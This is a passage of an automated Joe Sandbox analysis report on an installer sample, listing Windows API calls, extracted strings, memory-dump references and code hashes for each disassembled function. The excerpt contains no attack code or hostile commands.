                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 225703358-0
                                                                                                    • Opcode ID: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                                    • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                                                                    • Opcode Fuzzy Hash: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                                    • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                                                    APIs
                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                                                                    • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                                                                    • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$Load
                                                                                                    • String ID: $ $Internal error: Item already expanding
                                                                                                    • API String ID: 1675784387-1948079669
                                                                                                    • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                                    • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                                                                    • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                                    • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                                                                    APIs
                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringWrite
                                                                                                    • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                                    • API String ID: 390214022-3304407042
                                                                                                    • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                                    • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                                                    • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                                    • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                                                    APIs
                                                                                                    • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                                                                    • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                                                                    • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassInfoLongMessageSendWindow
                                                                                                    • String ID: COMBOBOX$Inno Setup: Language
                                                                                                    • API String ID: 3391662889-4234151509
                                                                                                    • Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                                    • Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
                                                                                                    • Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                                    • Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
                                                                                                    APIs
                                                                                                    • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                                      • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                      • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale$DefaultSystem
                                                                                                    • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                    • API String ID: 1044490935-665933166
                                                                                                    • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                                    • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                                                                    • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                                    • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                                                    • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                                      • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                                                    • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                                      • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                                                    • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                    • String ID: ,$?
                                                                                                    • API String ID: 2359071979-2308483597
                                                                                                    • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                                    • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                                                    • Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                                    • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                                                    APIs
                                                                                                    • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                                                    • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                                                    • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                                                    • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                                                    • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                                                    • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                                                    • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                                    • String ID:
                                                                                                    • API String ID: 1030595962-0
                                                                                                    • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                                    • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                                                    • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                                    • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                                                    APIs
                                                                                                    • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                                                    • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                                                    • RealizePalette.GDI32(?), ref: 0041CF92
                                                                                                    • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                                                    • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                                                    • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2222416421-0
                                                                                                    • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                                    • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                                                    • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                                    • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                                                      • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                                      • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                      • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                      • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                                                                    • TranslateMessage.USER32(?), ref: 004573B3
                                                                                                    • DispatchMessageA.USER32(?), ref: 004573BC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                                    • String ID: [Paused]
                                                                                                    • API String ID: 1007367021-4230553315
                                                                                                    • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                    • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                                    • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                    • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                                    APIs
                                                                                                    • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                                    • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                                    • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                                    • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$LoadSleep
                                                                                                    • String ID: CheckPassword
                                                                                                    • API String ID: 4023313301-1302249611
                                                                                                    • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                                    • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                                                                    • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                                    • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                                                                    APIs
                                                                                                      • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                                      • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                                      • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                                    • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                                                                    • GetTickCount.KERNEL32 ref: 00477CE6
                                                                                                    • GetTickCount.KERNEL32 ref: 00477CF0
                                                                                                    • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                                                                    Strings
                                                                                                    • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                                                                    • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                                    • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                                    • API String ID: 613034392-3771334282
                                                                                                    • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                                    • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                                    • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                                    • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                                                                    Strings
                                                                                                    • Fusion.dll, xrefs: 004597DF
                                                                                                    • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                                    • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                                    • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                                    • CreateAssemblyCache, xrefs: 00459836
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                                    • API String ID: 190572456-3990135632
                                                                                                    • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                                    • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                                    • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                                    • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                                    • GetFocus.USER32 ref: 0041C168
                                                                                                    • GetDC.USER32(?), ref: 0041C174
                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                                    • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                                    • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 3303097818-0
                                                                                                    • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                                    • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                                    • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                                    • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                                    • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                                    • 6FB62980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                                      • Part of subcall function 004107F8: 6FB5C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                                    • 6FBCCB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                                    • 6FBCC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                                    • 6FBCCB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                                    • 6FB60860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$B60860B62980C400C740
                                                                                                    • String ID:
                                                                                                    • API String ID: 2995079530-0
                                                                                                    • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                    • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                                    • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                    • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
